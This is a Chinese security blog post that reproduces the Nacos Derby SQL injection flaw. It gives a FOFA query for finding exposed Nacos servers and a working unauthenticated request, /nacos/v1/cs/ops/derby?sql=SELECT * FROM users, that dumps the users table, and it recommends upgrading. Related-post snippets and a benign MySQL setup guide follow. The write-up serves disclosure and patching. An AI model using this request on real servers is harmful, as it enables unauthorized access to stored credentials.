nacos-SQL注入

最新推荐文章于 2025-02-19 23:22:52 发布
最新推荐文章于 2025-02-19 23:22:52 发布
阅读量474 收藏
点赞数 1
文章标签: web安全 网络安全 系统安全 阿里云 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bmaoHk/article/details/142986269
版权

一、描述

nacos是阿里巴巴的一个开源项目,旨在帮助构建云原生应用程序和微服务平台。

二、资产测绘

fofa:title=“nacos”
在这里插入图片描述
三、漏洞复现

/nacos/v1/cs/ops/derby?&sql=SELECT%20*FROM%20users

在这里插入图片描述

在这里插入图片描述
四、修复建议
升级到最新版nacos

更多漏洞信息请关注,安全技术达人公众号号。将复现,推送最新漏洞信息。
在这里插入图片描述

bmaoHk
关注
【漏洞复现】Nacos Derby SQL注入漏洞
晚风不及你
04-28 3914
Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。
sql注入漏洞详解
qq_39511050的博客
09-17 1646
sql注入漏洞详解
修复nacos漏洞问题SQL注入CNVD-2020-67618、未授权访问CVE-2021-29441等
kaopuzong的博客
02-06 3625
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:未授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
Nacos Derby 远程命令执行漏洞修复建议
拉丁解牛技术专栏
02-19 341
由于Nacos <= 2.4.0 BETA 存在 Derby 远程命令执行漏洞,恶意攻击者利用此漏洞可以未授权执行SQL语句,最终导致任意代码执行。目前该漏洞PoC和技术细节已在互联网上公开。
nacos 数据库sql
samHuangLiang的博客
03-19 2821
/* SQLyog Ultimate v12.09 (64 bit) MySQL - 5.6.22 : Database - nacos ********************************************************************* */ /*!40101 SET NAMES utf8 */; /*!40101 SET SQL_MODE=''*/...
nacos-mysql.sql
02-05
nacos默认使用嵌入式数据库实现数据的存储,若想使用外部mysql存储nacos数据,需进行文件配置,此文件为生成nacos的数据库表的脚本。
nacos-1.2.1.sql
04-14
nacos-1.2.1.sql
Nacos配置mysqlsql
weixin_51001722的博客
07-16 1277
【代码】Nacos配置mysqlsql
Windows Docker安装运行Nacos, Nacos-2.3.2 MYSQL表配置sql文件
05-16
Nacos-2.3.2 MYSQL表配置sql文件
nacos-server-1.4.0.tar.gz
01-16
10. **扩展性**:Nacos 设计上考虑了扩展性,支持插件化开发,如 SQL 注入防护、额外的日志适配等。扩展点主要集中在 `com.alibaba.nacos.core.plugin` 包。 通过深入分析 Nacos 1.4.0 的源码,开发者不仅可以理解...
nacos1.3.2-mysql.sql
08-26
拿到nacos 1.3.2版本 部署高可用版本,结果nacos的config里面的sql文件无法直接导入mysql ,我自己做了一下处理,方便直接导入sql使用
nacos脚本.sql
07-01
nacos配置mysql永久缓存的数据库脚本
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用!...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
nacos 2.2.3版本
06-29
1. **安全修复**:这个版本最重要的更新是修复了多个安全漏洞,包括但不限于SQL注入、权限绕过等问题,提高了系统的安全性,防止恶意攻击。 2. **性能优化**:对服务发现和配置管理的性能进行了优化,提升了数据...
Nacos
while(life)++;
12-02 3088
服务发现、服务配置、服务管理平台注册中心、配置中心、服务管理继承,不用注解//获得当前请求的服务实例 List < Server > reachableServers = loadBalancer . getReachableServers();//随机获取一个数 int random = ThreadLocalRandom . current() . nextInt(reachableServers . size());
渗透测试--Nacos系统
qq_53003652的博客
11-25 3217
nacos是指,阿里为 SpringCloud 贡献了一个子项目,叫做 SpringCloud Alibaba,其中包括了微服务开发中的几个基础组件,Nacos 就是此项目中的一项技术。可以实现服务注册中心、分布式配置中心。针对微服务架构中的服务发现、配置管理、服务治理的综合型解决方案。Nacos在攻防实战中也是经常遇到,大多数布置是在内网,但是公网上也是有不少的,因为其存在多个漏洞,师傅们也是通过nacos拿下了不少分数。
nacos适配SqlServer、Oracle
码猿手
08-25 3492
继上文《》后补充nacos适配SqlServer、Oracle的贴码,主要区别是SqlServer、Oracle的分页SQL有点不一样,做个记录;SqlServer的分页有三种实现方式:offset /fetch next、利用max(主键)、利用row_number关键字;ps:具体可参考《
nacos mysql
最新发布
03-25
### 如何在 Nacos 中配置 MySQL 数据源 为了使 Nacos 能够通过 Docker 部署并使用 MySQL 作为其数据存储,可以按照以下方式完成配置。 #### 准备工作 确保已有一个运行中的 MySQL 实例可用。如果尚未安装 MySQL,可以通过 Docker 进行快速部署[^2]: ```bash docker run --name mysql-nacos -e MYSQL_ROOT_PASSWORD=root -d mysql:5.7 ``` 此命令会启动一个名为 `mysql-nacos` 的容器,并设置 root 密码为 `root`。 #### 修改 Nacos 配置文件 Nacos 默认支持多种数据源配置选项,其中一种就是将数据持久化至 MySQL。为此需要编辑 Nacos 的配置文件 `application.properties`,该文件通常位于 Nacos 容器内的 `/home/nacos/conf/` 目录下[^4]。 以下是关键的 MySQL 数据源配置项: ```properties spring.datasource.platform=mysql db.num=1 db.url.0=jdbc:mysql://<MYSQL_HOST>:3306/nacos_config?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true db.user=<YOUR_MYSQL_USER> db.password=<YOUR_MYSQL_PASSWORD> ``` - `<MYSQL_HOST>` 替换为实际的 MySQL 主机地址(例如 `localhost` 或者具体的 IP 地址)。 - `<YOUR_MYSQL_USER>` 和 `<YOUR_MYSQL_PASSWORD>` 分别替换为您的 MySQL 用户名和密码。 - 如果遇到 `No DataSource set` 错误,则可能是由于数据库端口或用户名/密码配置有误引起的[^5]。 #### 创建必要的数据库表结构 在 MySQL 中创建名为 `nacos_config` 的数据库,并导入官方提供的 SQL 文件来初始化所需的表结构。SQL 文件路径一般为 Nacos 发布包中的 `conf/nacos-mysql.sql`。可通过以下命令执行脚本: ```sql CREATE DATABASE IF NOT EXISTS nacos_config; USE nacos_config; SOURCE /path/to/nacos-mysql.sql; -- 将路径替换为您本地的实际位置 ``` #### 启动 Nacos 容器并与 MySQL 关联 当上述准备工作完成后,即可启动 Nacos 容器并将环境变量传递给它以指定外部 MySQL 数据源。示例如下: ```bash docker run \ --name=nacos-server \ -e MODE=standalone \ -e SPRING_DATASOURCE_PLATFORM=mysql \ -e DB_NUM=1 \ -e DB_URL_0=jdbc:mysql://<MYSQL_HOST>:3306/nacos_config?characterEncoding=utf8&connectTimeout=1000&socketTimeout=3000&autoReconnect=true \ -e DB_USERNAME=<YOUR_MYSQL_USER> \ -e DB_PASSWORD=<YOUR_MYSQL_PASSWORD> \ -d nacos/nacos-server ``` 以上命令中 `-e` 参数用于向容器注入环境变量,从而覆盖默认的数据源配置[^3]。 --- ### 注意事项 - 若目标环境中存在多个 MySQL 实例,请务必确认所使用的实例及其监听端口号无误。 - 当前描述适用于单机模式下的 Nacos 部署;对于生产环境推荐采用集群模式以提高可靠性与性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值